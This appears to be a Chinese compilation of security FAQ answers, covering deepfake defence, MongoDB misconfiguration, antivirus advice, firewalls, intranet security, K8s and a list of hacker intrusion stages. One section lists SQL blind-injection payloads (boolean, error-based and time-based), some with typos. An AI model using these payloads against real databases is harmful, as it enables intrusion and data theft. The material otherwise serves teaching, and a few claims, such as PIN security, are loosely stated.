針對深度偽造攻擊預防措施有以下這些:
對深度造假應用零信任:深度造假多少能夠檢測并警告我們的技術領先,威脅行為者幾乎總是具有領導和主動性。在無法阻止威脅的情況下,直接采用零信任架構,假設違背,從不信任,總是驗證。需要假設在您的網絡上存在隱蔽的惡意活動,無論他是否真實存在。
多重驗證:用戶要通過兩種以上的認證機制之后,才能得到授權,使用計算機資源。例如,用戶要輸入PIN碼,插入銀行卡,最后再經指紋比對,通過這三種認證方式,才能獲得授權。這種認證方式可以提高安全性。
保護信息,避免誘惑:對于不明平臺發來的廣告、中獎、交友等鏈接提高警惕,不隨意填寫個人信息,以免被騙子“精準圍獵”;
網絡流程可視化:通過在網絡各節點部署流量分析措施,可實現全局網絡流量數據的捕獲、解密、處理和按需輸出,統一支撐網絡資產發現、網絡安全威脅分析、網絡行為審計、數據泄露檢測等工作的開展。
相互提示:共同預防做好宣傳防范工作。尤其是提醒老年人在接到電話、短信時,要放下電話,再次撥打家人電話確認,不要貿然轉賬。
Mongo DB未授權是指開啟該服務時不添加任何參數導致用戶可以通過默認端口無需密碼對數據庫任意操作,出現原因是沒有給數據庫添加上賬號密碼使用默認空口令。MongoDB是?個基于分布式?件存儲的數據庫,默認端?27017,Mongodb在啟動的時候提供了很多參數,如?志記錄到哪個?件夾,是否開啟認證等。
降低計算機病毒危害的措施有以下這些:
安裝和維護防病毒軟件:防病毒軟件可識別惡意軟件并保護我們的計算機免受惡意軟件侵害。安裝來自信譽良好的供應商的防病毒軟件是預防和檢測感染的重要步驟。始終直接訪問供應商網站,而不是點擊廣告或電子郵件鏈接。由于攻擊者不斷地制造新病毒和其他形式的惡意代碼,因此保持我們使用的防病毒軟件保持最新非常重要。
謹慎使用鏈接和附件:在使用電子郵件和網絡瀏覽器時采取適當的預防措施以降低感染風險。警惕未經請求的電子郵件附件,并在單擊電子郵件鏈接時小心謹慎,即使它們貌似來自我們認識的人。
阻止彈出廣告:彈出窗口阻止程序禁用可能包含惡意代碼的窗口。大多數瀏覽器都有一個免費功能,可以啟用它來阻止彈出廣告。
使用權限有限的帳戶:瀏覽網頁時,使用權限有限的賬戶是一種很好的安全做法。如果我們確實受到感染,受限權限可防止惡意代碼傳播并升級到管理賬戶。
禁用外部媒體自動運行和自動播放功能:禁用自動運行和自動播放功能可防止感染惡意代碼的外部媒體在我們的計算機上自動運行。
更改密碼:如果我們認為我們的計算機受到感染,應該及時更改我們的密碼(口令)。這包括可能已緩存在我們的網絡瀏覽器中的任何網站密碼。創建和使用強密碼,使攻擊者難以猜測。
保持軟件更新:在我們的計算機上安裝軟件補丁,這樣攻擊者就不會利用已知漏洞。如果可用,請考慮啟用自動更新。
資料備份:定期將我們的文檔、照片和重要電子郵件備份到云或外部硬盤驅動器。如果發生感染,我們的信息不會丟失。
安裝或啟用防火墻:防火墻可以通過在惡意流量進入我們的計算機之前阻止它來防止某些類型的感染。一些操作系統包括防火墻;如果我們使用的操作系統包含一個防火墻,請啟用它。
使用反間諜軟件工具:間諜軟件是一種常見的病毒源,但可以通過使用識別和刪除間諜軟件的程序來最大程度地減少感染。大多數防病毒軟件都包含反間諜軟件選項,確保啟用。
監控賬戶:尋找任何未經授權的使用或異常活動,尤其是銀行賬戶。如果我們發現未經授權或異常的活動,請立即聯系我們的賬戶提供商。
避免使用公共Wi-Fi:不安全的公共Wi-Fi可能允許攻擊者攔截我們設備的網絡流量并訪問我們的個人信息。.
設置pin碼指的是設置windows上除了賬戶密碼的另一種密碼,但獨立于windows賬戶密碼,兩個密碼都可以進行登錄windows,pin密碼因為要求都是數字,相對于賬戶密碼更加便于記憶且只能通過本機登錄無法使用pin密碼來進行遠程登錄,所以安全性更高。
pin碼在windows系統最少四位,且都為數字。沒有了長密碼難輸入、易忘的困擾。不要以為四位的密碼不安全,國外有很多研究證明,長密碼并不能保證安全。在合理的驗證機制下,4位PIN和長密碼的安全等級是一樣的。當然,pin碼可以不止四位。
其次,這也是pin碼與普通密碼的區別所在,pin碼與普通密碼是獨立的,當大家在用微軟賬戶登錄自己的電腦時,設置一個pin碼可以解決每次都要輸入復雜密碼的困擾,輸入pin碼,甚至不用確認就自動登錄。
pin碼只與你設定的設備相關聯,當你丟失了pin碼,可以通過傳統密碼重置,而且這個pin碼如果被黑客獲取,黑客依然不能得到你的管理員權限,可以理解為pin碼的權限僅限登錄。
防火墻從邏輯上講即是一個分離器,一個限制器,也是一個分析器。所謂“防火墻”是指一種將內部網和公眾訪問網(如Internet)分開的方法,它實際上是一種建立在現代通信網絡技術和信息安全技術基礎上的應用性安全技術,隔離技術。越來越多地應用于專用網絡與公用網絡的互聯環境之中,尤其以接入Internet網絡為最甚。
防火墻主要功能如下:
包過濾
包過濾是防火墻所要實現的最基本功能,它可將不符合要求的包過濾掉。包過濾技術已經由原來的靜態包過濾發展到了動態包過濾,靜態包過濾只是在網絡層上對包的地址、端口等信息進行判定控制,而動態包過濾是在所有通信層上對包的狀態進行檢測分析,判斷包是否符合安全要求。動態包過濾技術支持多種協議和應用程序,易擴展、易實現。
審計和報警機制
審計是一種重要的安全措施,用以監控通信行為和完善安全策略,檢查安全漏洞和錯誤配置,并對入侵者起到一定的威懾作用。報警機制是在通信違反相關策略以后,以多種方式如聲音、郵件、電話、手機短信息及時報告給管理人員。防火墻的審計和報警機制在防火墻體系中是很重要的,只有有了審計和報警,管理人員才可能知道網絡是否受到了攻擊。
遠程管理
遠程管理是防火墻管理功能的擴展之一,也是非常實用的功能,防火墻是否具有這種遠程管理功能已成為選擇防火墻產品的重要參考指標之一。使用防火墻的遠程管理功能可以在辦公室直接管理托管在網絡運營部門的防火墻,甚至坐在家中就可以重新調整防火墻的安全規則和策略。
NAT
絕大多數防火墻都具有網絡地址轉換(NAT)功能。目前防火墻一般采用雙向NAT,即SNAT和DNAT。SNAT用于對內部網絡地址進行轉換,對外部網絡隱藏內部網絡的結構,使得對內部的攻擊更加困難;并可以節省IP資源,有利于降低成本。DNAT主要用于實現外網主機對內網和DMZ區主機的訪問。
代理
目前代理主要有如下兩種實現方式。分別是透明代理(Transparent proxy)和傳統代理。
MAC地址與IP地址的綁定
把MAC地址與IP地址綁定在一起,主要用于防止那些受到控制(不允許訪問外網)的內部用戶通過更換IP地址來訪問外網。
流量控制(帶寬管理)和統計分析、流量計費
流量控制可以分為基于IP地址的控制和基于用戶的控制。基于IP地址的控制是對通過防火墻各個網絡接口的流量進行控制,基于用戶的控制是通過用戶登錄來控制每個用戶的流量,從而防止某些應用或用戶占用過多的資源。并且通過流量控制可以保證重要用戶和重要接口的連接。
統計分析是建立在流量控制基礎之上的。一般防火墻通過對基于IP、服務、時間、協議等進行統計,并與管理界面實現掛接,實時或者以統計報表的形式輸出結果。流量計費因此也是非常容易實現的。
VPN
在以往的網絡安全產品中,VPN是一個單獨產品,現在大多數廠商把VPN與防火墻捆綁在一起,進一步增強和擴展了防火墻的功能,這也是一種產品整合的趨勢。
U盤中病毒建議進行格式化,格式化后立刻使用數據恢復軟件對U盤進行掃描恢復。以下是格式化和使用DiskGenius數據恢復軟件恢復U盤數據的詳細步驟:
右鍵U盤所在盤符
打開資源管理器找到U盤所在的盤符,使用鼠標右鍵U盤所在盤符,選擇格式化選項并單擊進入格式化窗口;
格式化選項
在格式化U盤窗口中,根據需求選擇相應的文件系統、分配的單元的大小等必選項,也可以根據需求設置卷標和是否勾選快速格式化等選項;
開始格式化
在上述操作都完成后,單機開始按鈕后U盤開始進行格式化,到此U盤格式化完成
開始恢復
打開軟件,在左側選中U盤,然后點擊”恢復文件”按鈕;
恢復選項
將軟件提供的恢復選項全部都勾選上,然后點擊”開始”按鈕,軟件自動進入掃描階段,耐心等待掃描完成即可;
預覽文件
該工具提供文件預覽功能,讓用戶檢查丟失的數據是否可以被正常恢復;
恢復完成
勾選想要恢復的U盤文件,然后右擊鼠標來選擇”復制到指定文件夾”選項,到此文件恢復完畢。
內網安全的威脅不同于網絡邊界的威脅。網絡邊界安全技術防范來自Internet上的攻擊,主要是防范來自公共的網絡服務器如HTTP或SMTP的攻擊。網絡邊界防范(如邊界防火墻系統等)減小了資深黑客僅僅只需接入互聯網、寫程序就可訪問企業網的幾率。內網安全威脅主要源于企業內部。惡性的黑客攻擊事件一般都會先控制局域網絡內部的一臺Server,然后以此為基地,對Internet上其他主機發起惡性攻擊。因此,應在邊界展開黑客防護措施,同時建立并加強內網防范策略。
虛擬專用網(VPN)用戶的訪問對內網的安全造成了巨大的威脅。因為它們將弱化的桌面操作系統置于企業防火墻的防護之外。很明顯VPN用戶是可以訪問企業內網的。因此要避免給每一位VPN用戶訪問內網的全部權限。這樣可以利用登錄控制權限列表來限制VPN用戶的登錄權限的級別,即只需賦予他們所需要的訪問權限級別即可,如訪問郵件服務器或其他可選擇的網絡資源的權限。
合作企業網也是造成內網安全問題的一大原因。例如安全管理員雖然知道怎樣利用實際技術來完固防火墻,保護MS-SQL,但是Slammer蠕蟲仍能侵入內網,這就是因為企業給了他們的合作伙伴進入內部資源的訪問權限。由此,既然不能控制合作者的網絡安全策略和活動,那么就應該為每一個合作企業創建一個DMZ,并將他們所需要訪問的資源放置在相應的DMZ中,不允許他們對內網其他資源的訪問。
智能的自動執行實時跟蹤的安全策略是有效地實現網絡安全實踐的關鍵。它帶來了商業活動中一大改革,極大的超過了手動安全策略的功效。商業活動的現狀需要企業利用一種自動檢測方法來探測商業活動中的各種變更,因此,安全策略也必須與相適應。例如實時跟蹤企業員工的雇傭和解雇、實時跟蹤網絡利用情況并記錄與該計算機對話的文件服務器。總之,要做到確保每天的所有的活動都遵循安全策略。
大型企業網可能同時支持四到五個服務器傳送e-mail,有的企業網還會出現幾十個其他服務器監視SMTP端口的情況。這些主機中很可能有潛在的郵件服務器的攻擊點。因此要逐個中斷網絡服務器來進行審查。若一個程序(或程序中的邏輯單元)作為一個window文件服務器在運行但是又不具有文件服務器作用的,關掉該文件的共享協議。
若一個內網上連了千萬臺(例如30000臺)機子,那么要期望保持每一臺主機都處于鎖定狀態和補丁狀態是非常不現實的。大型企業網的安全考慮一般都有擇優問題。這樣,首先要對服務器做效益分析評估,然后對內網的每一臺網絡服務器進行檢查、分類、修補和強化工作。必定找出重要的網絡服務器(例如實時跟蹤客戶的服務器)并對他們進行限制管理。這樣就能迅速準確地確定企業最重要的資產,并做好在內網的定位和權限限制工作。
審查網絡,為實現無線訪問建立基礎。排除無意義的無線訪問點,確保無線網絡訪問的強制性和可利用性,并提供安全的無線訪問接口。將訪問點置于邊界防火墻之外,并允許用戶通過VPN技術進行訪問。
對于過客不必給予其公開訪問內網的權限。許多安全技術人員執行的“內部無Internet訪問”的策略,使得員工給客戶一些非法的訪問權限,導致了內網實時跟蹤的困難。因此,須在邊界防火墻之外建立過客訪問網絡塊。
主機是被攻擊的主要對象。與其努力使所有主機不遭攻擊(這是不可能的),還不如在如何使攻擊者無法通過受攻擊的主機來攻擊內網方面努力。于是必須解決企業網絡的使用和在企業經營范圍建立虛擬邊界防護這個問題。這樣,如果一個市場用戶的客戶機被侵入了,攻擊者也不會由此而進入到公司的R&D。因此要實現公司R&D與市場之間的訪問權限控制。大家都知道怎樣建立互聯網與內網之間的邊界防火墻防護,現在也應該意識到建立網上不同商業用戶群之間的邊界防護。
網絡用戶也存在著安全隱患。有的用戶或許對網絡安全知識非常欠缺,例如不知道RADIUS和TACACS之間的不同,或不知道代理網關和分組過濾防火墻之間的不同等等,但是他們作為公司的合作者,也是網絡的使用者。因此企業網就要讓這些用戶也容易使用,這樣才能引導他們自動的響應網絡安全策略。
另外,在技術上,采用安全交換機、重要數據的備份、使用代理網關、確保操作系統的安全、使用主機防護系統和入侵檢測系統等等措施。
由于棧一般默覺得1-2m,一旦出現死循環或者是大量的遞歸調用,在不斷的壓棧過程中,造成棧容量超過1m而導致溢出。
解決方式:
方法一:用棧把遞歸轉換成非遞歸
通常,一個函數在調用還有一個函數之前,要作例如以下的事情:
a)將實在參數,返回地址等信息傳遞給被調用函數保存;
b)為被調用函數的局部變量分配存儲區;
c)將控制轉移到被調函數的入口.
從被調用函數返回調用函數之前,也要做三件事情:
a)保存被調函數的計算結果;
b)釋放被調函數的數據區;
c)按照被調函數保存的返回地址將控制轉移到調用函數.
全部的這些,不論是變量還是地址,本質上來說都是”數據”,都是保存在系統所分配的棧中的. 那么自己就能夠寫一個棧來存儲必要的數據,以降低系統負擔。
方法二:使用static對象替代nonstatic局部對象
在遞歸函數設計中,能夠使用static對象替代nonstatic局部對象(即棧對象),這不僅能夠降低每次遞歸調用和返回時產生和釋放nonstatic對象的開銷,并且static對象還能夠保存遞歸調用的中間狀態,并且可為各個調用層所訪問。
方法三:增大堆棧大小值
當創建一個線程的堆棧時,系統將會保留一個鏈接程序的/STACK開關指明的地址空間區域。可是,當調用CreateThread或_beginthreadex函數時,能夠重載原先提交的內存數量。這兩個函數都有一個參數,能夠用來重載原先提交給堆棧的地址空間的內存數量。假設設定這個參數為0,那么系統將使用/STACK開關指明的已提交的堆棧大小值。后面將假定我們使用默認的堆棧大小值,即1MB的保留區域,每次提交一個頁面的內存。
1)基于布爾SQL盲注
left(database(),1)>'s'
ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
regexp正則注入 select user() regexp '^[a-z]';
select user() like 'ro%'
2)基于報錯的SQL盲注
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2)通過floor報錯 向下取整
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10).exp()select * from test where id=1 and exp(~(select * from(select user())a));
3)延時注入如何來判斷?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
網絡安全問題主要帶來以下問題:
個人信息泄露:個人信息泄露,實質上是一些IT技術人員利用技術手段和工具進行的技術性竊取,有別于一般的偷盜。隨著互聯網應用的普及和人們對互聯網的依賴,互聯網的安全問題也日益凸顯。惡意程序、各類釣魚和欺詐繼續保持高速增長,同時黑客攻擊和大規模的個人信息技術竊取頻發,與各種網絡攻擊大幅增長相伴的,是大量網民個人信息的被技術性竊取與財產損失的不斷增加。目前信息安全“黑洞門”已經到觸目驚心的地步,網站攻擊與技術竊取正在向批量化、規模化方向發展,用戶隱私和權益遭到侵害,特別是一些重要數據甚至流向他國,不僅是個人和企業,信息安全威脅已經上升至國家安全層面。從某漏洞響應平臺上收錄的數據顯示,目前該平臺已知漏洞就可導致23.6億條隱私信息泄露,包括個人隱私信息、賬號密碼、銀行卡信息、商業機密信息等。導致大量數據泄露的最主要來源是:互聯網網站、游戲以及錄入了大量身份信息的政府系統。根據公開信息,2011年至今,已有11.27億用戶隱私信息被泄露。
病毒攻擊:計算機病毒(Computer Virus)指編制或者在計算機程序中插入的破壞計算機功能或者破壞數據,影響計算機正常使用并且能夠自我復制的一組計算機指令。計算機病毒具有傳播性、隱蔽性、感染性、潛伏性、可激發性、表現性或破壞性。計算機病毒的生命周期:開發期→傳染期→潛伏期→發作期→發現期→消化期→消亡期。
口令破解:攻擊者攻擊目標時常常把破譯用戶的口令作為攻擊的開始。只要攻擊者能猜測或者確定用戶的口令,他就能獲得機器或者網絡的訪問權,并能訪問到用戶能訪問到的任何資源。如果這個用戶有域管理員或root用戶權限,這是極其危險的。口令攻擊是黑客最喜歡采用的入侵網絡的方法。黑客通過獲取系統管理員或其他殊用戶的口令,獲得系統的管理權,竊取系統信息、磁盤中的文件甚至對系統進行破壞。
網絡監聽:網絡監聽是一種監視網絡狀態、數據流程以及網絡上信息傳輸的管理工具,它可以將網絡界面設定成監聽模式,并且可以截獲網絡上所傳輸的信息。也就是說,當黑客登錄網絡主機并取得超級用戶權限后,若要登錄其它主機,使用網絡監聽便可以有效地截獲網絡上的數據,這是黑客使用最好的方法。但是網絡監聽只能應用于連接同一網段的主機,通常被用來獲取用戶密碼等。
K8S安全容器具有以下特性:
自動裝箱:建構于容器之上,基于資源依賴及其他約束自動完成容器部署且不影響其可用性,并通過調度機制混合關鍵型應用和非關鍵型應用的工作負載于同一節點以提升資源利用率。
自我修復(自愈):支持容器故障后自動重啟、節點故障后重新調度容器,以及其他可用節點、健康狀態檢查失敗后關閉容器并重新創建等自我修復機制。
水平擴展:支持通過簡單命令或UI手動水平擴展,以及基于CPU等資源負載率的自動水平擴展機制。
服務發現和負載均衡:K8S通過其附加組件之一的KubeDNS(或CoreDNS)為系統內置了服務發現功能,它會為每個Service配置DNS名稱,并允許集群內的客戶端直接使用此名稱發出訪問請求,而Service則通過iptables或ipvs內建了負載均衡機制。
自動發布和回滾:K8S支持“灰度”更新應用程序或其配置信息,它會監控更新過程中應用程序的健康狀態,以確保它不會在同一時刻殺掉所有實例,而此過程中一旦有故障發生,就會立即自動執行回滾操作。
密鑰和配置管理:K8S的ConfigMap實現了配置數據與Docker鏡像解耦,需要時,僅對配置做出變更而無須重新構建Docker鏡像,這為應用開發部署帶來了很大的靈活性。此外,對于應用所依賴的一些敏感數據,如用戶名和密碼、令牌、密鑰等信息,K8S專門提供了Secret對象為其解耦,既便利了應用的快速開發和交付,又提供了一定程度上的安全保障。
存儲編排:K8S支持Pod對象按需自動掛載不同類型的存儲系統,這包括節點本地存儲、公有云服務商的云存儲(如AWS和GCP等),以及網絡存儲系統(例如,NFS、iSCSI、GlusterFS、Ceph、Cinder和Flocker等)。
批量處理執行:除了服務型應用,K8S還支持批處理作業及CI(持續集成),如果需要,一樣可以實現容器故障后恢復。
云制造安全體系架構包括以下這些層:
物理資源層:是制造云的物理設備和資源的基礎。制造云中的資源包括設計、制造、生產管理、銷售、服務、物料等各種能力單元。
虛擬資源層:把制造資源和能力虛擬化封裝和規范化描述,將物理資源影射成邏輯資源能力,形成虛擬化的制造資源和能力。
核心服務層:主要包括任務和需求解析器、云服務搜索與匹配、云服務綜合評估、云服務優選與組合、云服務分配與調用請求、云服務分配管理和云服務監控管理等功能模塊。
應用接口層:通過對制造云服務平臺中已有的適合的云服務進行重用、組合、驗證,構成即時應變的松耦合制造云服務應用。
應用層:在知識、語義、數據挖掘、機器學習、統計推理等技術的支持下,為用戶提供智能化的主動服務。
蠕蟲技術的現狀如下:
多平臺:新型蠕蟲不再局限于Windows操作系統計算機,而是可以攻擊多樣化的平臺,尤其是現在流行的UNIX,或者攻擊流行文件類型所支持的宏語言或腳本語言。
多攻擊點:新蠕蟲能夠以多種方式入侵系統,其中包括攻擊網絡服務器、瀏覽器、電子郵件、文件共享及其他基于網絡的應用,或者借助于共享媒介。
超速傳播:利用各種技術以最優化蠕蟲傳播速度,從而最大化蠕蟲在短時間內定位盡可能多易感染計算機的可能性。
多態:為逃避檢測,跳過過濾并阻止實時分析,蠕蟲采用病毒的多態技術。每個蠕蟲副本都可以利用功能上等價的指令以及加密技術生成新代碼。
變形:改變自身形態外,變形蠕蟲還在復制的不同階段中釋放不同行為模式的指令表。
傳輸工具:由于編蟲可以迅速危及大量系統的安全,他們是傳播多種惡意載荷的理想工具,比如DDos攻擊、rootkit、垃圾郵件生成器和間諜軟件。
零日攻擊:為達到最有效的突襲和最廣的分布,蠕蟲需要攻擊不為人知的漏洞。這種漏洞在蠕蟲發起進攻時才被網絡公眾發現。
云安全技術包括以下這些方面:
身份認證技術:身份認證技術是在計算機網絡中確認操作者身份的過程而產生的解決方法。計算機網絡世界中的一切信息(包括用戶的身份信息)都是用一組特定的數據來表示的,計算機只能識別用戶的數字身份,所有對用戶的授權也是針對用戶數字身份的授權。如何保證以數字身份進行操作的操作者就是這個數字身份合法的擁有者,也就是說保證操作者的物理身份與數字身份相對應,身份認證技術就是為了解決這個問題而產生的。
數據安全技術:數據作為信息的重要載體,其安全問題在信息安全中占有非常重要的地位。數據的保密性、可用性、可控性和完整性是數據安全技術的主要研究內容。數據保密性的理論基礎是密碼學,而可用性、可控性和完整性是數據安全的重要保障,沒有后者提供技術保障,再強的加密算法也難以保證數據的安全。與數據安全密切相關的技術主要有以下幾種,每種相關但又有所不同。
防火墻技術:防火墻技術最初是針對Internet網絡不安全因素所采取的一種保護措施。顧名思義,防火墻就是用來阻擋外部不安全因素影響的內部網絡屏障,其目的就是防止外部網絡用戶未經授權的訪問。它是一種計算機硬件和軟件的結合,使Internet與Intranet之間建立起一個安全網關(Security Gateway),從而保護內部網免受非法用戶的侵入,防火墻主要由服務訪問政策、驗證工具、包過濾和應用網關四個部分組成,防火墻就是一個位于計算機和它所聯結的網絡之間的軟件或硬件,該計算機流入/流出的所有網絡通信均要經過此防火墻。
安全審計技術:審計會對用戶使用何種信息資源、使用的時間,以及如何使用(執行何種操作)進行記錄與監控。審計和監控是實現系統安全的最后一道防線,處于系統的最高層。審計與監控能夠再現原有的進程和問題,這對于責任追查和數據恢復非常有必要。審計跟蹤是系統活動的流水記錄。該記錄按事件從始至終的途徑,順序檢查、審查和檢驗每個事件的環境及活動。
終端用戶安全技術:對于使用云服務的用戶,應該保證自己計算機的安全。在用戶的終端上部署安全軟件,包括反惡意軟件、殺毒軟件、個人防火墻以及IPS類型的軟件。目前,瀏覽器已經普遍成為云服務應用的客戶端,但不幸的是,所有的互聯網瀏覽器毫無例外地存在軟件漏洞,這些軟件漏洞加大了終端用戶被攻擊的風險,從而影響云計算應用的安全。因此,云用戶應該采取必要措施保護瀏覽器免受攻擊,在云環境中實現端到端的安全。云用戶應使用自動更新功能,定期完成瀏覽器打補丁和更新的工作。
漏洞掃描NTV全稱為Network Vulnerability Tool,中文為網絡漏洞工具本質上就是網絡漏洞掃描系統,一種自動檢測遠程目標主機安全漏洞的工具。是指基于漏洞數據庫,通過掃描等手段對指定的遠程或者本地計算機系統的安全脆弱性進行檢測,發現可利用漏洞的一種安全檢測(滲透攻擊)行為。
網站的漏洞掃描工具有:
Nikto
是一個開源的Web服務器掃描程序,它可以對Web服務器的多種項目(包括3500個潛在的危險文件/CGI,以及超過900個服務器版本,還有250多個服務器上的版本特定問題)進行全面的測試。其掃描項目和插件經常更新并且可以自動更新(如果需要的話)。
Paros
這是一個對Web應用程序的漏洞進行評估的代理程序,即一個基于Java的web代理程序,可以評估Web應用程序的漏洞。
WebScarab
這是一款強大的Web應用程序掃描程序。SPI Dynamics的這款應用程序安全評估工具有助于確認Web應用中已知的和未知的漏洞。它還可以檢查一個Web服務器是否正確配置,并會嘗試一些常見的Web攻擊,如參數注入、跨站腳本、目錄遍歷攻擊(directory traversal)等等。
WebInspect
這是一款強大的Web應用程序掃描程序。SPI Dynamics的這款應用程序安全評估工具有助于確認Web應用中已知的和未知的漏洞。它還可以檢查一個Web服務器是否正確配置,并會嘗試一些常見的Web攻擊,如參數注入、跨站腳本、目錄遍歷攻擊(directory traversal)等等。
Whisker/libwhisker
Libwhisker是一個Perla模塊,適合于HTTP測試。它可以針對許多已知的安全漏洞,測試HTTP服務器,特別是檢測危險CGI的存在。Whisker是一個使用libwhisker的掃描程序。
黑客入侵攻擊的步驟包括以下九個步驟:
踩點:踩點的主要目的是獲取目標主機的信息,比如網絡域名、網絡地址分配、域名服務器、郵件交換主機、網關等關鍵系統的位置及軟硬件信息等。
掃描:掃描通過踩點已獲得了目標主機的一定信息,下一步需要確定目標網絡范圍內哪些主機是“活動”的,以及它們提供哪些服務,以便集中精力在最有希望的攻破的點上發動攻擊。
查點:查點就是根據掃描到的目標主機采用的不同操作系統進一步確定其上用戶和用戶組名、路由表、SNMP信息、共享資源、服務程序及旗標等信息。
獲取訪問權:在搜集到目標系統的足夠信息后,下一步要完成的工作自然是設法獲得目標系統的訪問權,為進一步的入侵創造條件。
權限提升:攻擊者通過前面的步驟獲得的系統訪問權往往是最普通的使用權限,但是卻能使攻擊者接觸到更多的信息,此時攻擊者往往會利用這些信息(如存放密碼的文件等)獲得更高權限的用戶的密碼,或者將已經獲得的普通用戶權限提升至超級用戶權限,以便完成對系統的完全控制。
竊取:此時黑客就會對其感興趣的信息進行竊取。
掩蓋蹤跡:上述的工作中,黑客必然會留下痕跡。此時,黑客需要做的首要工作就是清除所有入侵痕跡,避免自己被檢測出來,以便能夠繼續保持對被入侵系統的控制。
創建后門:好的管理員往往會定期更換現有以后的密碼,為了不在管理員更改密碼后失去對被入侵主機的控制。黑客往往會在被入侵主機上創建一些后門及陷阱,以便更好的控制被入侵主機。
拒絕服務攻擊:而如果黑客的目的是破壞,那么現在他就能發起最可怕的攻擊。拒絕服務攻擊,從而使受害主機徹底失去提供服務的能力。
